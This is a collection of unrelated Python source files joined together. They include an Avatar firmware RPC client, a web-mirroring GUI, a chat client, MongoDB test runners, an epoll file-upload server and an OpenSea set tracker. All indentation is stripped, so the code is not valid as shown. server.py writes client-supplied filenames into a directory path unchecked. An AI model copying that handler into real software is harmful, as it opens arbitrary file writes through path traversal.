if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
raise AvatarRemoteError(ref.get_value().error)
return ref.get_value().value
def write_memory(self, address, size, value):
msg = create_avatar_message("AVATAR_RPC_HTD_WRITE_MEMORY", {"address": address, "size": size, "value": value})
expected_replies = ["AVATAR_RPC_DTH_REPLY_OK", "AVATAR_RPC_DTH_REPLY_ERROR"]
cv = threading.Condition()
ref = Reference()
cv.acquire()
self._queued_commands.put((msg, expected_replies, cv, ref))
cv.wait()
cv.release()
if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
raise AvatarRemoteError(ref.get_value().error)
def read_memory_untyped(self, address, size):
assert(size <= 255)
msg = create_avatar_message("AVATAR_RPC_HTD_READ_UNTYPED_MEMORY", {"address": address, "size": size})
expected_replies = ["AVATAR_RPC_DTH_REPLY_READ_UNTYPED_MEMORY", "AVATAR_RPC_DTH_REPLY_ERROR"]
cv = threading.Condition()
ref = Reference()
cv.acquire()
self._queued_commands.put((msg, expected_replies, cv, ref))
cv.wait()
cv.release()
if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
raise AvatarRemoteError(ref.get_value().error)
return ref.get_value().data
def write_memory_untyped(self, address, data):
assert(len(data) <= 255)
assert(isinstance(data, bytes))
msg = create_avatar_message("AVATAR_RPC_HTD_WRITE_UNTYPED_MEMORY", {"address": address, "data": data})
expected_replies = ["AVATAR_RPC_DTH_REPLY_OK", "AVATAR_RPC_DTH_REPLY_ERROR"]
cv = threading.Condition()
ref = Reference()
cv.acquire()
self._queued_commands.put((msg, expected_replies, cv, ref))
cv.wait()
cv.release()
if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
raise AvatarRemoteError(ref.get_value().error)
def execute_codelet(self, address):
msg = create_avatar_message("AVATAR_RPC_HTD_CODELET_EXECUTE", {"address": address})
expected_replies = ["AVATAR_RPC_DTH_REPLY_CODELET_EXECUTION_FINISHED", "AVATAR_RPC_DTH_REPLY_ERROR"]
cv = threading.Condition()
ref = Reference()
cv.acquire()
self._queued_commands.put((msg, expected_replies, cv, ref))
cv.wait()
cv.release()
if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
raise AvatarRemoteError(ref.get_value().error)
def cont(self):
msg = create_avatar_message("AVATAR_RPC_HTD_RESUME_VM", {})
expected_replies = ["AVATAR_RPC_DTH_REPLY_OK", "AVATAR_RPC_DTH_REPLY_ERROR"]
cv = threading.Condition()
ref = Reference()
cv.acquire()
self._queued_commands.put((msg, expected_replies, cv, ref))
cv.wait()
cv.release()
if ref.get_value().name == "AVATAR_RPC_DTH_REPLY_ERROR":
raise AvatarRemoteError(ref.get_value().error)
def stop(self):
self._terminate.set()
self._protocol.stop()
|
util.py | # util
import types
from zlib import compress as _compress, decompress
import threading
import warnings
try:
from dpark.portable_hash import portable_hash as _hash
except ImportError:
import pyximport
pyximport.install(inplace=True)
from dpark.portable_hash import portable_hash as _hash
COMPRESS = 'zlib'
def compress(s):
return _compress(s, 1)
try:
from lz4 import compress, decompress
COMPRESS = 'lz4'
except ImportError:
try:
from snappy import compress, decompress
COMPRESS = 'snappy'
except ImportError:
pass
def spawn(target, *args, **kw):
t = threading.Thread(target=target, name=target.__name__, args=args, kwargs=kw)
t.daemon = True
t.start()
return t
# hash(None) is id(None), different from machines
# http://effbot.org/zone/python-hash.htm
def portable_hash(value):
return _hash(value)
# similar to itertools.chain.from_iterable, but faster in PyPy
def chain(it):
for v in it:
for vv in v:
yield vv
def izip(*its):
its = [iter(it) for it in its]
try:
while True:
yield tuple([it.next() for it in its])
except StopIteration:
pass
|
wsgui.py | #! /usr/bin/env python
"""Tkinter-based GUI for websucker.
Easy use: type or paste source URL and destination directory in
their respective text boxes, click GO or hit return, and presto.
"""
from Tkinter import *
import websucker
import os
import threading
import Queue
import time
VERBOSE = 2
try:
class Canceled(Exception):
"Exception used to cancel run()."
except (NameError, TypeError):
Canceled = __name__ + ".Canceled"
class SuckerThread(websucker.Sucker):
stopit = 0
savedir = None
rootdir = None
def __init__(self, msgq):
self.msgq = msgq
websucker.Sucker.__init__(self)
self.setflags(verbose=VERBOSE)
self.urlopener.addheaders = [
('User-agent', 'websucker/%s' % websucker.__version__),
]
def message(self, format, *args):
if args:
format = format%args
##print format
self.msgq.put(format)
def run1(self, url):
try:
try:
self.reset()
self.addroot(url)
self.run()
except Canceled:
self.message("[canceled]")
else:
self.message("[done]")
finally:
self.msgq.put(None)
def savefile(self, text, path):
if self.stopit:
raise Canceled
websucker.Sucker.savefile(self, text, path)
def getpage(self, url):
if self.stopit:
raise Canceled
return websucker.Sucker.getpage(self, url)
def savefilename(self, url):
path = websucker.Sucker.savefilename(self, url)
if self.savedir:
n = len(self.rootdir)
if path[:n] == self.rootdir:
path = path[n:]
while path[:1] == os.sep:
path = path[1:]
path = os.path.join(self.savedir, path)
return path
def XXXaddrobot(self, *args):
pass
def XXXisallowed(self, *args):
return 1
class App:
sucker = None
msgq = None
def __init__(self, top):
self.top = top
top.columnconfigure(99, weight=1)
self.url_label = Label(top, text="URL:")
self.url_label.grid(row=0, column=0, sticky='e')
self.url_entry = Entry(top, width=60, exportselection=0)
self.url_entry.grid(row=0, column=1, sticky='we',
columnspan=99)
self.url_entry.focus_set()
self.url_entry.bind("<Key-Return>", self.go)
self.dir_label = Label(top, text="Directory:")
self.dir_label.grid(row=1, column=0, sticky='e')
self.dir_entry = Entry(top)
self.dir_entry.grid(row=1, column=1, sticky='we',
columnspan=99)
self.go_button = Button(top, text="Go", command=self.go)
self.go_button.grid(row=2, column=1, sticky='w')
self.cancel_button = Button(top, text="Cancel",
command=self.cancel,
state=DISABLED)
self.cancel_button.grid(row=2, column=2, sticky='w')
self.auto_button = Button(top, text="Paste+Go",
command=self.auto)
self.auto_button.grid(row=2, column=3, sticky='w')
self.status_label = Label(top, text="[idle]")
self.status_label.grid(row=2, column=4, sticky='w')
self.top.update_idletasks()
self.top.grid_propagate(0)
def message(self, text, *args):
if args:
text = text % args
self.status_label.config(text=text)
def check_msgq(self):
while not self.msgq.empty():
msg = self.msgq.get()
if msg is None:
self.go_button.configure(state=NORMAL)
self.auto_button.configure(state=NORMAL)
self.cancel_button.configure(state=DISABLED)
if self.sucker:
self.sucker.stopit = 0
self.top.bell()
else:
self.message(msg)
self.top.after(100, self.check_msgq)
def go(self, event=None):
if not self.msgq:
self.msgq = Queue.Queue(0)
self.check_msgq()
if not self.sucker:
self.sucker = SuckerThread(self.msgq)
if self.sucker.stopit:
return
self.url_entry.selection_range(0, END)
url = self.url_entry.get()
url = url.strip()
if not url:
self.top.bell()
self.message("[Error: No URL entered]")
return
self.rooturl = url
dir = self.dir_entry.get().strip()
if not dir:
self.sucker.savedir = None
else:
self.sucker.savedir = dir
self.sucker.rootdir = os.path.dirname(
websucker.Sucker.savefilename(self.sucker, url))
self.go_button.configure(state=DISABLED)
self.auto_button.configure(state=DISABLED)
self.cancel_button.configure(state=NORMAL)
self.message( '[running...]')
self.sucker.stopit = 0
t = threading.Thread(target=self.sucker.run1, args=(url,))
t.start()
def cancel(self):
if self.sucker:
self.sucker.stopit = 1
self.message("[canceling...]")
def auto(self):
tries = ['PRIMARY', 'CLIPBOARD']
text = ""
for t in tries:
try:
text = self.top.selection_get(selection=t)
except TclError:
continue
text = text.strip()
if text:
break
if not text:
self.top.bell()
self.message("[Error: clipboard is empty]")
return
self.url_entry.delete(0, END)
self.url_entry.insert(0, text)
self.go()
class AppArray:
def __init__(self, top=None):
if not top:
top = Tk()
top.title("websucker GUI")
top.iconname("wsgui")
top.wm_protocol('WM_DELETE_WINDOW', self.exit)
self.top = top
self.appframe = Frame(self.top)
self.appframe.pack(fill='both')
self.applist = []
self.exit_button = Button(top, text="Exit", command=self.exit)
self.exit_button.pack(side=RIGHT)
self.new_button = Button(top, text="New", command=self.addsucker)
self.new_button.pack(side=LEFT)
self.addsucker()
##self.applist[0].url_entry.insert(END, "http://www.python.org/doc/essays/")
def addsucker(self):
self.top.geometry("")
frame = Frame(self.appframe, borderwidth=2, relief=GROOVE)
frame.pack(fill='x')
app = App(frame)
self.applist.append(app)
done = 0
def mainloop(self):
while not self.done:
time.sleep(0.1)
self.top.update()
def exit(self):
for app in self.applist:
app.cancel()
app.message("[exiting...]")
self.done = 1
def main():
AppArray().mainloop()
if __name__ == '__main__':
main()
|
Client.py | import socket
from typing import Optional, Union
import threading
import logging
from data import Message, MessageListener, CloseListener
logger = logging.getLogger('CA-Client')
class Client:
_socket: socket.socket
_host: str = '127.0.0.1'
_port: int = 20307
_running: bool = False
_messageCallback: MessageListener
_closeCallback: CloseListener = lambda: None
_rcvThread: Optional[threading.Thread] = None
_calledOnClose: bool = False
ignoreErrors: bool = True
def SetAddress(self, host: str, port: Union[int, str] = 20307) -> None:
logger.info(f'changing server to {host}:{port}!')
self._host = host
self._port = int(port)
self._running = False
if self._rcvThread:
logger.info('stopping current connection...')
self._socket.close()
self._rcvThread.join()
self._socket = socket.create_connection( (self._host, self._port) )
self._run()
logger.info('new connection created!')
def SetUsername(self, uname: str) -> None:
logger.info(f'changing username to {uname}')
self.Send( Message( 'system', f':CHGUNAME:{uname}' ) )
def GetAddress(self) -> str:
return f'{self._host}:{self._port}'
def SetMessageListener( self, func: MessageListener) -> None:
self._messageCallback = func
def SetCloseListener( self, func: CloseListener) -> None:
self._closeCallback = func
def Send( self, msg: Message ) -> None:
if self._running:
msgRaw: bytes = msg.toJson().encode()
header = int.to_bytes( len(msgRaw), 4, 'big')
self._socket.send(header)
self._socket.send(msgRaw)
def Stop(self) -> None:
if self._running:
assert self._rcvThread is not None, 'Why tf is rcvThread None??'
self._running = False
self._socket.close()
self._rcvThread.join()
self._rcvThread = None # type: ignore
self._onClose()
def _onClose( self ) -> None:
if not self._calledOnClose:
self._closeCallback()
self._calledOnClose = True
def _run(self) -> None:
self._running = True
self._calledOnClose = False
self._rcvThread = threading.Thread(target=self._rcv )
self._rcvThread.start()
def _rcv(self) -> None:
while self._running:
# noinspection PyBroadException
try:
raw_size = self._socket.recv(4)
except Exception:
if self.ignoreErrors:
continue
elif self._running:
self._running = False
self._onClose()
raise
else:
return
size = int.from_bytes(raw_size, 'big')
if size == 0:
continue
logger.info(f'incoming message size: {size}')
self._messageCallback(
Message.fromJson(
self._socket.recv(size).decode() # decode() will from UTF-8 if no argument is given
)
)
def __del__(self) -> None:
self.Stop()
def __enter__(self) -> 'Client':
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self.Stop()
@staticmethod
def CheckIsValid( host: str, port: Union[int, str] ) -> bool:
try:
socket.getaddrinfo( host, port, 0, socket.SOCK_STREAM )
return True
except socket.gaierror:
return False
|
testcases.py | """
Subclasses of unittest.TestCase.
"""
from __future__ import absolute_import
import os
import os.path
import shutil
import threading
import unittest
from .. import config
from .. import core
from .. import logging
from .. import utils
def make_test_case(test_kind, *args, **kwargs):
"""
Factory function for creating TestCase instances.
"""
if test_kind not in _TEST_CASES:
raise ValueError("Unknown test kind '%s'" % (test_kind))
return _TEST_CASES[test_kind](*args, **kwargs)
class TestCase(unittest.TestCase):
"""
A test case to execute.
"""
def __init__(self, logger, test_kind, test_name):
"""
Initializes the TestCase with the name of the test.
"""
unittest.TestCase.__init__(self, methodName="run_test")
if not isinstance(logger, logging.Logger):
raise TypeError("logger must be a Logger instance")
if not isinstance(test_kind, basestring):
raise TypeError("test_kind must be a string")
if not isinstance(test_name, basestring):
raise TypeError("test_name must be a string")
self.logger = logger
self.test_kind = test_kind
self.test_name = test_name
self.fixture = None
self.return_code = None
self.is_configured = False
def long_name(self):
"""
Returns the path to the test, relative to the current working directory.
"""
return os.path.relpath(self.test_name)
def basename(self):
"""
Returns the basename of the test.
"""
return os.path.basename(self.test_name)
def short_name(self):
"""
Returns the basename of the test without the file extension.
"""
return os.path.splitext(self.basename())[0]
def id(self):
return self.test_name
def shortDescription(self):
return "%s %s" % (self.test_kind, self.test_name)
def configure(self, fixture, *args, **kwargs):
"""
Stores 'fixture' as an attribute for later use during execution.
"""
if self.is_configured:
raise RuntimeError("configure can only be called once")
self.is_configured = True
self.fixture = fixture
def run_test(self):
"""
Runs the specified test.
"""
raise NotImplementedError("run_test must be implemented by TestCase subclasses")
def as_command(self):
"""
Returns the command invocation used to run the test.
"""
return self._make_process().as_command()
def _execute(self, process):
"""
Runs the specified process.
"""
if config.INTERNAL_EXECUTOR_NAME is not None:
self.logger.info("Starting %s under executor %s...\n%s",
self.shortDescription(),
config.INTERNAL_EXECUTOR_NAME,
process.as_command())
else:
self.logger.info("Starting %s...\n%s", self.shortDescription(), process.as_command())
process.start()
self.logger.info("%s started with pid %s.", self.shortDescription(), process.pid)
self.return_code = process.wait()
if self.return_code != 0:
raise self.failureException("%s failed" % (self.shortDescription()))
self.logger.info("%s finished.", self.shortDescription())
def _make_process(self):
"""
Returns a new Process instance that could be used to run the
test or log the command.
"""
raise NotImplementedError("_make_process must be implemented by TestCase subclasses")
class CPPUnitTestCase(TestCase):
"""
A C++ unit test to execute.
"""
def __init__(self,
logger,
program_executable,
program_options=None):
"""
Initializes the CPPUnitTestCase with the executable to run.
"""
TestCase.__init__(self, logger, "Program", program_executable)
self.program_executable = program_executable
self.program_options = utils.default_if_none(program_options, {}).copy()
def run_test(self):
try:
program = self._make_process()
self._execute(program)
except self.failureException:
raise
except:
self.logger.exception("Encountered an error running C++ unit test %s.", self.basename())
raise
def _make_process(self):
return core.process.Process(self.logger,
[self.program_executable],
**self.program_options)
class CPPIntegrationTestCase(TestCase):
"""
A C++ integration test to execute.
"""
def __init__(self,
logger,
program_executable,
program_options=None):
"""
Initializes the CPPIntegrationTestCase with the executable to run.
"""
TestCase.__init__(self, logger, "Program", program_executable)
self.program_executable = program_executable
self.program_options = utils.default_if_none(program_options, {}).copy()
def configure(self, fixture, *args, **kwargs):
TestCase.configure(self, fixture, *args, **kwargs)
self.program_options["connectionString"] = self.fixture.get_connection_string()
def run_test(self):
try:
program = self._make_process()
self._execute(program)
except self.failureException:
raise
except:
self.logger.exception("Encountered an error running C++ integration test %s.",
self.basename())
raise
def _make_process(self):
return core.programs.generic_program(self.logger,
[self.program_executable],
**self.program_options)
class DBTestCase(TestCase):
"""
A dbtest to execute.
"""
def __init__(self,
logger,
dbtest_suite,
dbtest_executable=None,
dbtest_options=None):
"""
Initializes the DBTestCase with the dbtest suite to run.
"""
TestCase.__init__(self, logger, "DBTest", dbtest_suite)
# Command line options override the YAML configuration.
self.dbtest_executable = utils.default_if_none(config.DBTEST_EXECUTABLE, dbtest_executable)
self.dbtest_suite = dbtest_suite
self.dbtest_options = utils.default_if_none(dbtest_options, {}).copy()
def configure(self, fixture, *args, **kwargs):
TestCase.configure(self, fixture, *args, **kwargs)
# If a dbpath was specified, then use it as a container for all other dbpaths.
dbpath_prefix = self.dbtest_options.pop("dbpath", DBTestCase._get_dbpath_prefix())
dbpath = os.path.join(dbpath_prefix, "job%d" % (self.fixture.job_num), "unittest")
self.dbtest_options["dbpath"] = dbpath
shutil.rmtree(dbpath, ignore_errors=True)
try:
os.makedirs(dbpath)
except os.error:
# Directory already exists.
pass
def run_test(self):
try:
dbtest = self._make_process()
self._execute(dbtest)
except self.failureException:
raise
except:
self.logger.exception("Encountered an error running dbtest suite %s.", self.basename())
raise
def _make_process(self):
return core.programs.dbtest_program(self.logger,
executable=self.dbtest_executable,
suites=[self.dbtest_suite],
**self.dbtest_options)
@staticmethod
def _get_dbpath_prefix():
"""
Returns the prefix of the dbpath to use for the dbtest
executable.
Order of preference:
1. The --dbpathPrefix specified at the command line.
2. Value of the TMPDIR environment variable.
3. Value of the TEMP environment variable.
4. Value of the TMP environment variable.
5. The /tmp directory.
"""
if config.DBPATH_PREFIX is not None:
return config.DBPATH_PREFIX
for env_var in ("TMPDIR", "TEMP", "TMP"):
if env_var in os.environ:
return os.environ[env_var]
return os.path.normpath("/tmp")
class JSTestCase(TestCase):
"""
A jstest to execute.
"""
# A wrapper for the thread class that lets us propagate exceptions.
class ExceptionThread(threading.Thread):
def __init__(self, my_target, my_args):
threading.Thread.__init__(self, target=my_target, args=my_args)
self.err = None
def run(self):
try:
threading.Thread.run(self)
except Exception as self.err:
raise
else:
self.err = None
def _get_exception(self):
return self.err
DEFAULT_CLIENT_NUM = 1
def __init__(self,
logger,
js_filename,
shell_executable=None,
shell_options=None,
test_kind="JSTest"):
"Initializes the JSTestCase with the JS file to run."
TestCase.__init__(self, logger, test_kind, js_filename)
# Command line options override the YAML configuration.
self.shell_executable = utils.default_if_none(config.MONGO_EXECUTABLE, shell_executable)
self.js_filename = js_filename
self.shell_options = utils.default_if_none(shell_options, {}).copy()
self.num_clients = JSTestCase.DEFAULT_CLIENT_NUM
def configure(self, fixture, num_clients=DEFAULT_CLIENT_NUM, *args, **kwargs):
TestCase.configure(self, fixture, *args, **kwargs)
if self.fixture.port is not None:
self.shell_options["port"] = self.fixture.port
global_vars = self.shell_options.get("global_vars", {}).copy()
data_dir = self._get_data_dir(global_vars)
# Set MongoRunner.dataPath if overridden at command line or not specified in YAML.
if config.DBPATH_PREFIX is not None or "MongoRunner.dataPath" not in global_vars:
# dataPath property is the dataDir property with a trailing slash.
data_path = os.path.join(data_dir, "")
else:
data_path = global_vars["MongoRunner.dataPath"]
global_vars["MongoRunner.dataDir"] = data_dir
global_vars["MongoRunner.dataPath"] = data_path
# Don't set the path to the executables when the user didn't specify them via the command
# line. The functions in the mongo shell for spawning processes have their own logic for
# determining the default path to use.
if config.MONGOD_EXECUTABLE is not None:
global_vars["MongoRunner.mongodPath"] = config.MONGOD_EXECUTABLE
if config.MONGOS_EXECUTABLE is not None:
global_vars["MongoRunner.mongosPath"] = config.MONGOS_EXECUTABLE
if self.shell_executable is not None:
global_vars["MongoRunner.mongoShellPath"] = self.shell_executable
test_data = global_vars.get("TestData", {}).copy()
test_data["minPort"] = core.network.PortAllocator.min_test_port(fixture.job_num)
test_data["maxPort"] = core.network.PortAllocator.max_test_port(fixture.job_num)
# Marks the main test when multiple test clients are run concurrently, to notify the test
# of any code that should only be run once. If there is only one client, it is the main one.
test_data["isMainTest"] = True
global_vars["TestData"] = test_data
self.shell_options["global_vars"] = global_vars
shutil.rmtree(data_dir, ignore_errors=True)
self.num_clients = num_clients
try:
os.makedirs(data_dir)
except os.error:
# Directory already exists.
pass
def _get_data_dir(self, global_vars):
"""
Returns the value that the mongo shell should set for the
MongoRunner.dataDir property.
"""
# Command line options override the YAML configuration.
data_dir_prefix = utils.default_if_none(config.DBPATH_PREFIX,
global_vars.get("MongoRunner.dataDir"))
data_dir_prefix = utils.default_if_none(data_dir_prefix, config.DEFAULT_DBPATH_PREFIX)
return os.path.join(data_dir_prefix,
"job%d" % (self.fixture.job_num),
config.MONGO_RUNNER_SUBDIR)
def run_test(self):
threads = []
try:
# Don't thread if there is only one client.
if self.num_clients == 1:
shell = self._make_process(self.logger)
self._execute(shell)
else:
# If there are multiple clients, make a new thread for each client.
for i in xrange(self.num_clients):
t = self.ExceptionThread(my_target=self._run_test_in_thread, my_args=[i])
t.start()
threads.append(t)
except self.failureException:
raise
except:
self.logger.exception("Encountered an error running jstest %s.", self.basename())
raise
finally:
for t in threads:
t.join()
for t in threads:
if t._get_exception() is not None:
raise t._get_exception()
def _make_process(self, logger=None, thread_id=0):
# If logger is none, it means that it's not running in a thread and thus logger should be
# set to self.logger.
logger = utils.default_if_none(logger, self.logger)
is_main_test = True
if thread_id > 0:
is_main_test = False
return core.programs.mongo_shell_program(logger,
executable=self.shell_executable,
filename=self.js_filename,
isMainTest=is_main_test,
**self.shell_options)
def _run_test_in_thread(self, thread_id):
# Make a logger for each thread.
logger = logging.loggers.new_logger(self.test_kind + ':' + str(thread_id),
parent=self.logger)
shell = self._make_process(logger, thread_id)
self._execute(shell)
class MongosTestCase(TestCase):
"""
A TestCase which runs a mongos binary with the given parameters.
"""
def __init__(self,
logger,
mongos_options):
"""
Initializes the mongos test and saves the options.
"""
self.mongos_executable = utils.default_if_none(config.MONGOS_EXECUTABLE,
config.DEFAULT_MONGOS_EXECUTABLE)
# Use the executable as the test name.
TestCase.__init__(self, logger, "mongos", self.mongos_executable)
self.options = mongos_options.copy()
def configure(self, fixture, *args, **kwargs):
"""
Ensures the --test option is present in the mongos options.
"""
TestCase.configure(self, fixture, *args, **kwargs)
# Always specify test option to ensure the mongos will terminate.
if "test" not in self.options:
self.options["test"] = ""
def run_test(self):
try:
mongos = self._make_process()
self._execute(mongos)
except self.failureException:
raise
except:
self.logger.exception("Encountered an error running %s.", mongos.as_command())
raise
def _make_process(self):
return core.programs.mongos_program(self.logger,
executable=self.mongos_executable,
**self.options)
_TEST_CASES = {
"cpp_unit_test": CPPUnitTestCase,
"cpp_integration_test": CPPIntegrationTestCase,
"db_test": DBTestCase,
"js_test": JSTestCase,
"mongos_test": MongosTestCase,
}
|
server.py | from threading import Thread
from queue import Queue
from message import Message, MessageType
import socket
import select
class Connection:
def __init__(self, _logger, socket, address="unknown", fileroot='/tmp'):
self._logger = _logger
self.socket = socket
self.address = address
# Create a buffer byte array for our client
self.buffer = b""
self.responses = {}
self.file = False
self.fileroot = fileroot
# Close our socket and cleanup
def close(self):
self.socket.close()
# Close any open files
if self.fileIsOpen():
self.file.close()
def processMessage(self, message):
# ### Process the message depending on what type of message it is
if message.type == MessageType.FileStart:
# If FileStart, open a new file for writing to
self.file = open(
"{0}/{1}".format(self.fileroot, message.filename), "wb")
self._logger.debug(
"Opened: {}".format(message.filename))
if message.type in MessageType.File:
# Check if a file was never opened for this connection
if not self.fileIsOpen():
raise RuntimeError("No file opened")
# All File message types have a content, lets write that to the
# file.
self.file.write(message.content)
self._logger.debug("Wrote {}.".format(
message.content))
# We can go ahead and close the file if we receive a FileEnd message
if message.type == MessageType.FileEnd:
self.file.close()
def processBuffer(self, buffer):
# Add this events buffer to our overall buffer
self.buffer += buffer
# Our packets are terminated with a null terminator (\0).
# If we find one we know we have received a whole packet.
packetMarkerPosition = self.buffer.find(b'\0')
while packetMarkerPosition != -1:
try:
# Extract our packet from the buffer
messageBuffer = self.buffer[:packetMarkerPosition]
# Attempt to convert our packet into a message
message = Message.fromBytes(messageBuffer)
self._logger.debug("Got a {} message!".format(message.type.name))
self.processMessage(message)
# If we have any issues running the above code, such as failing to
# parse the incoming bytes into a valid message, we should log that
# error.
except RuntimeError as err:
self._logger.error(err)
finally:
# Trim the buffer of packet we just processed
self.buffer = self.buffer[packetMarkerPosition + 1:]
# Check if there is another whole packet in the buffer
packetMarkerPosition = self.buffer.find(
b'\0')
def recv(self, bufferSize):
buffer = self.socket.recv(bufferSize)
# If we get an empty message, when know the communication channel
# has been closed
if len(buffer) == 0:
self.shutdown()
return 0
self._logger.debug("Got bytes: {0}".format(buffer))
self.processBuffer(buffer)
return None
def fileIsOpen(self):
return self.file and not self.file.closed
def shutdown(self):
self.socket.shutdown(socket.SHUT_RDWR)
class Server:
def __init__(self, _logger, config):
self._logger = _logger
# Setup config with defaults
self.config = {
'file_root': '/tmp',
'event_timeout': 0.2,
'internal_recv_size': 8192
}
self.config.update(config)
# This msgQueue can be used to communicate messages to the server thread
# See the commented out section in run for more info
self.msgQueue = Queue()
# Open a new socket to listen on
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set the socket to reuse old port if server is restarted
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# This is set to true when we want to end the server loop
self.done = False
def listen(self, port, addr='0.0.0.0'):
# Sets the interface and port number for the socket to listen for connections
# on.
self.socket.bind((addr, port))
self.socket.listen(1)
# In order to prevent locking up the main thread, we start a new child thread.
# This child thread will continously run the server's loop function and
# check self.done periodically if to see if it should end
thread = Thread(target=self.loop, args=())
thread.start()
self._logger.debug("Server listening on {}".format(port))
# We will return the thread handle so that it can be acted on in the future
return thread
def close(self):
self.done = True
def loop(self):
connections = {}
# See http://scotdoyle.com/python-epoll-howto.html for a detailed
# explination on the epoll interface
epoll = select.epoll()
# We register our socket server in EPOLLIN mode to watch for incomming
# connections.
epoll.register(self.socket.fileno(), select.EPOLLIN)
try:
# Check if we should end our loop
while not self.done:
# This will return any new events
events = epoll.poll(self.config['event_timeout'])
# Process any new events
for fileno, event in events:
# This handles a new connection
if fileno == self.socket.fileno():
client, address = self.socket.accept()
client.setblocking(0)
self._logger.info(
"New connection from {0}".format(address))
# Store our client in a connections dictionary
connections[client.fileno()] = Connection(self._logger, client, address, self.config['file_root'])
# Register incomming client connection with our epoll interface
epoll.register(client.fileno(), select.EPOLLIN)
# This event is called when there is data to be read in
elif event & select.EPOLLIN:
# Try to receive data from our client
mode = connections[fileno].recv(self.config['internal_recv_size'])
if mode is not None:
epoll.modify(fileno, mode)
# Check if transmission is complete. In our case we are
# using an NULL termination (\0)
# Now that we know the transmission is complete, we should
# send a response (switch to send mode)
# if not buffers[fileno].endswith(b'\\\\0') and buffers[fileno].endswith(b'\\0'):
# responses[fileno] = b'HTTP/1.0 200 OK\r\nDate: Mon, 1 Jan 1996 01:01:01 GMT\r\n'
# responses[fileno] += b'Content-Type: text/plain\r\nContent-Length: 13\r\n\r\n'
# responses[fileno] += b'Hello, world!'
# epoll.modify(fileno, select.EPOLLOUT)
# Server.parse_message(buffers[fileno])
# This event is called when there is data to be written out
elif event & select.EPOLLOUT:
pass
# # Send out our response
# numBytesWritten = connections[fileno].send(
# responses[fileno])
# self._logger.debug("Sent response: {0}".format(
# responses[fileno][:numBytesWritten]))
#
# # Truncate our response buffer (remove the part that is
# # already sent)
# responses[fileno] = responses[fileno][numBytesWritten:]
# self._logger.debug(responses[fileno])
#
# if len(responses[fileno]) == 0:
# epoll.modify(fileno, select.EPOLLIN)
# Endpoint has closed the connection (No need to send shutdown)
elif event & select.EPOLLHUP:
self._logger.debug("Connection to [{}] closed!".format(connections[fileno].address))
epoll.unregister(fileno)
connections[fileno].close()
del connections[fileno]
finally:
# Close all open connections
self._logger.debug("Closing all connections...")
for fileno in connections:
epoll.unregister(fileno)
connections[fileno].close()
# Unregister our server socket with our epoll
epoll.unregister(self.socket.fileno())
# Close our epoll
epoll.close()
# Close our socket server
self.socket.close()
self._logger.info("Server shutdown")
|
input_output_nums.py | #!/usr/bin/python
## This multithreading program runs five times
## and each time the program takes two numbers as given input
## and print sum of them.
import threading
import time
def MyThread(num1, num2):
print("Given Numbers: %s, %s" %(num1, num2))
sum1= int(num1) + int(num2)
print("Result: %d" %sum1)
return
def Main():
threads = []
for i in range(5):
t = threading.Thread(target=MyThread, args=(10,20))
threads.append(t)
time.sleep(0.5)
t.start()
if __name__ == '__main__':
Main()
|
sets.py | from cards import Cards
from ethereum import Ethereum
from json.decoder import JSONDecodeError
from opensea import OpenSea
from os.path import exists
from pushcontainer import push_container
from re import S
from singleton import Singleton
from threading import Thread
from time import time
import dearpygui.dearpygui as dpg
import json
import webbrowser
class Sets(metaclass=Singleton):
NullAddress = "0x0000000000000000000000000000000000000000"
def __init__(self, width, height, cards:Cards, walletAddress, contractAddress, logInfoCallback, logErrorCallback, dataFile='sets.json'):
self.cards = cards
self.walletAddress = walletAddress
self.contractAddress = contractAddress
self.window = dpg.generate_uuid()
self.totalETHText = dpg.generate_uuid()
self.totalUSDText = dpg.generate_uuid()
self.table = dpg.generate_uuid()
self.dataFile = dataFile
self.data = {}
self.setNames = []
self.columnsIdsByName = {}
self.lastUpdateTime = 0
self.logInfoCallback = logInfoCallback
self.logErrorCallback = logErrorCallback
self.LoadSetData()
with dpg.window(id=self.window, label="ParaSets", width=width, height=height, show=False):
dpg.add_button(label="Refresh", callback=lambda: self.Update())
self.InitTable()
def LoadSetData(self):
if exists(self.dataFile):
with open(self.dataFile, "r") as f:
try:
self.data = json.load(f)['parasets']
self.logInfoCallback(f"{self.dataFile} loaded.")
except JSONDecodeError as e:
self.logErrorCallback(f"{self.dataFile} load failed because: {str(e)}")
else:
self.logErrorCallback(f"{self.dataFile} is missing.")
self.data = {}
def InitTable(self):
t = dpg.add_table(
id=self.table,
parent=self.window,
header_row=True,
sortable=True,
reorderable=True,
resizable=True,
no_host_extendX=True,
policy=dpg.mvTable_SizingStretchProp)
with push_container(t) as table:
self.setNames = sorted(self.data)
for s in self.setNames:
self.columnsIdsByName[s] = dpg.add_table_column(label=s, no_sort=True, default_sort=True, prefer_sort_descending=True)
return table
def Show(self):
dpg.configure_item(self.window, show=True)
if (time() - self.lastUpdateTime >= 60 * 5):
Thread(target=self.Update, daemon=True).start()
def Update(self):
if dpg.does_item_exist(self.table):
dpg.delete_item(self.table)
self.table = self.InitTable()
ethInFiat = Ethereum.GetEthInFiat(1.0)
ownedAssets = OpenSea.GetAssets(self.walletAddress, self.contractAddress, logInfoCallback=self.logInfoCallback, logErrorCallback=self.logErrorCallback)
self.lastUpdateTime = time()
ownedTokens = set([int(a['token_id']) for a in ownedAssets])
missingPriceBySet = {}
setPriceBySet = {}
priceByToken = {}
with push_container(self.table):
for setName in sorted(self.data):
tokensInSet = set(self.data[setName])
setAssets = OpenSea.GetAssets(
walletAddress=None,
contractAddress=self.contractAddress,
logInfoCallback=self.logInfoCallback,
logErrorCallback=self.logErrorCallback,
tokens=list(tokensInSet))
unavailableTokens = []
missingTokens = tokensInSet - ownedTokens
missingPriceEth = 0.0
setPriceEth = 0.0
for asset in setAssets:
id = int(asset['token_id'])
sell_orders = asset['sell_orders']
tokenIsMissing = id in missingTokens
if sell_orders:
_, lPrice, __ = OpenSea.GetPrices(sell_orders[0])
if (tokenIsMissing):
missingPriceEth += lPrice
# whether owned or not, add it to the set price
priceByToken[id] = lPrice
setPriceEth += lPrice
else:
priceByToken[id] = 0
unavailableTokens.append(id)
